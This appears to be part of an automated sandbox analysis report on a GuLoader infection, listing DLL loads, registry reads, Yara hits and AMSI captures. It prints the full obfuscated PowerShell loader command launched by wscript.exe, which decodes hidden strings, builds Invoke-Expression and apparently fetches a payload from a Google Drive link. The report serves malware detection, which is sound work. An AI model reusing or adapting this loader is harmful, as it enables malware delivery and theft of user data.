Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wintypes.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2122178024.0000000008500000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000004.00000002.2116646966.0000000007667000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000004.00000002.2116646966.0000000007706000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000004.00000002.2116646966.00000000076E2000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Anti Malware Scan Interface: .Run("POWERSHELL "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal)", "0")

Yara detected GuLoader

Source: Yara match	File source: 00000004.00000002.2125155356.000000000A967000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2123886427.0000000008920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2112300960.0000000005ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2313093176.000001D96966F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Seashells1)$global:Cornett147 = [System.Text.Encoding]::ASCII.GetString($Procline)$global:Patellula=$Cornett147.substring(305164,29054)<#Blotless Lensstyres objet Spermatozoal #>$Foo
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Streptaster $Nanocephalus $kalkuleres), (Superassuming @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Plantings = [AppDomain]::CurrentDomain.GetAssemblies
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Bispernes57)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Dvrgpilens, $false).DefineType($Endoproct, $T
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Seashells1)$global:Cornett147 = [System.Text.Encoding]::ASCII.GetString($Procline)$global:Patellula=$Cornett147.substring(305164,29054)<#Blotless Lensstyres objet Spermatozoal #>$Foo

Suspicious powershell command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp. ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens 'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6 Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx ,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev F,dst- verP JubbaPeriotKrlhahTvrsk ForeaT,econ:Forma\nedb,B BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean (Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes ');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean (Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke ');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavega
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp. ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens 'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6 Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx ,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev F,dst- verP JubbaPeriotKrlhahTvrsk ForeaT,econ:Forma\nedb,B BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean (Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes ');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean (Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke ');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavega
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Tarboosh = 1;$Ldreforvaltningen='Substrin';$Ldreforvaltningen+='g';Function Selvstarterens($Journal){$Nomadeinvasionens165=$Journal.Length-$Tarboosh;For($Effectible=5; $Effectible -lt $Nomadeinvasionens165; $Effectible+=(6)){$Lagringsformers+=$Journal.$Ldreforvaltningen.Invoke($Effectible, $Tarboosh);}$Lagringsformers;}function Spelean($Surmaster){. ($Reproduktionsteknikkens) ($Surmaster);}$Uvelkomne=Selvstarterens 'PlummMSkul oPolerz,oliliOvulalbestylvi.uiagen.e/Bat.e5Vandp. ouse0Bas,e Nove(AntipW nyrei A.jenPrv.tdA.auaoAflgnw refosPulve Sty,kNPlyssTDds y Super1 Renl0Overb.Weste0b ned; catu LivreWAcqueiSpeaknMyo,o6ran e4 Sn g;Luthe Kintx rose6Photo4Bef t; odke AlgerrPimpsv Feis: nge1Eryth2South1 Over.Flag 0F,rce)debug AmeriG ,arseRotuncFloppkKokleofysio/kopif2Konom0Tipti1Lag.r0Kalku0Opret1S ksk0 A.cu1Unspr turbFstfroiImpe.rWhor.eMa sifUnid,oLand.xNonf /Doket1Sikke2vrang1 Deci.Mesom0 L,ee ';$Yellowfish=Selvstarterens 'G undUDimmosAflire,onharIncel- FradAD.utog R.coe.orksn,erdetHalen ';$Ellokomotiv242=Selvstarterens 'Falkeh elvetAdmirtSyge.pnyanls Th.n:Tugt / Lepi/A.pasdSbr dr Anchis kkevSupereFo.tm.BreasgRarefo Fonlo Bageg CapslBeforeAlkoh.Granic,ejrsoRecemmplate/ VaskuTeknocR.llo?ItczeeRescuxElevap VulsoUd,karDermatIn si=EpilodCrampoLuksuw BortnT rmilApheloNe gaa dtoed cams&Nonadi GlumdNoi.e=Amill1Skrivx QuinC .nsvK Kv.kkBro.hDSlovaLG nerKPupilk thuriBoatlJmortagHydroTkr,ptCsla p2FipskNV ndu2Aands8HellehdruesjCatholSlagt0U tral ask1det,c9IntruULiderbAquavuStenbxSl.ndJShove6 Avisw Subc9Overt ';$intersessional=Selvstarterens ' Stal>Tidsd ';$Reproduktionsteknikkens=Selvstarterens 'BygniiCha me T.okx ,ned ';$Guiding='Scop124';Spelean (Selvstarterens 'VirksSRiddeeJointtStave-Smr.aCFarmeoCastrnRegistFirmaeMilten G.vetProev F,dst- verP JubbaPeriotKrlhahTvrsk ForeaT,econ:Forma\nedb,B BromiColles pre i.hotodSand,dHydraeSt,mmr Ho,neha,mon.sthe.Unurnt ilatxCo tatAlcon Sylve-Fu,daV B.gsaindbelapparuAars eSabi Ammo,$P,atrG NonruSo ediExtradSrgeri RabunB issgSigna;Spe l ');Spelean (Selvstarterens ' .nneiJave,fDeleg Nonn(Frit.t TekseSocrasLuft.tDani,-Bead.pBalm,aQuiritfi.enhOlymp NonnaTAton,:Dechi\ AadsB rakiiPredesHektai PjatdSkrendprecieUund.rVolleeBre snEquip.Egenpt ashlxEnsilt,here) ultr{ TromeGunnaxPe muiGementS,gne}Ethno;Homes ');$Dilamination = Selvstarterens 'Yunp e ButtckonkahTkkesoNeden Komar% amma .alvpErratpIndhadKolleaMesmetAarboaParap%Konsu\CantoAObfuspBauxit rsenyTod,icConnuhJde vu,heolsfuran.Tabe.WPolsthEmbleiMorbi Trvej& K.nt& Pro, AlgareGashacImpu,hBreako Gte. Coryb$Ciliu ';Spelean (Selvstarterens 'Reabs$ Codeg JdinlRegrao Twi,bfdselaUnco.l Utru:Ob,lsfUnparoEnkelrAfslreOpfunc Sulfo PariuFilm,nR.licsUranoesandol,nder=ingvo(Staa.c QuadmGeo.hdAft n Pi.ds/AnkomcRader Brunl$ ModiD orsi JarglN.outaBa ekmKendei BensnGastra DdsdtSlingi Ast.oDushsnRedhe).ikke ');Spelean (Selvstarterens ' Konk$OncotgTiltalforudoModsvbHavega	Jump to behavior
